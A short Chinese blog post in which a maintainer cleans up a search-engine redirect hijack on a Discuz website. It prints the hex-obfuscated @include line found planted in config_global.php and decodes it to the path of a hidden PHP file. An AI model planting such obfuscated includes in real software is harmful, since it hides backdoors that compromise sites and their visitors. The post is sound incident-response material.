最近接到一个客户的单子,大致的问题是网站通过直接输入网址是不能打开,但是通过百度等搜索引擎搜索关键字,出来会跳到一个×××的网站,首先来说怀疑的是中毒了(都这个吊样了不是中毒了是啥。。。),什么都不说了直接装杀毒软件杀毒。果然杀出来一堆病毒,处理后能直接输入网址打开网页了,但是搜索的还是不正确。

联想到以前看到过的DNS劫持,难道这个叫搜索劫持?什么不懂问度娘,果然找到一篇文章也是DZ的被搜索劫持了,他修改的function_core.php这个文件,二话不说我兴奋的去网站目录搜索这个文件,很失望啊里面没有恶意的代码,难道我的目标错了吗?不死心的我又搜索出了另外可能在地方在config下的config_global.php文件,找到了恶意代码:

@include(PACK('H*','443A2F777777726F6F742F78676C6C2E636F6D2F75706C6F61642F696E7374616C6C2F696E636C7564652F696E7374616C6C5F63696E74656E2E706870'));

直接删除,马上搜索结果没有问题了~~哈哈~~

再深入的研究这段代码,发现

443A2F777777726F6F742F78676C6C2E636F6D2F75706C6F61642F696E7374616C6C2F696E636C7564652F696E7374616C6C5F63696E74656E2E706870

是十六进制,在线转为为字符串就是D:/wwwroot/xgll.com/upload/install/include/install_cinten.php

哈哈,找到万恶之源了,还说什么直接删除!

马上修改系统密码,文件权限!!希望一切平安!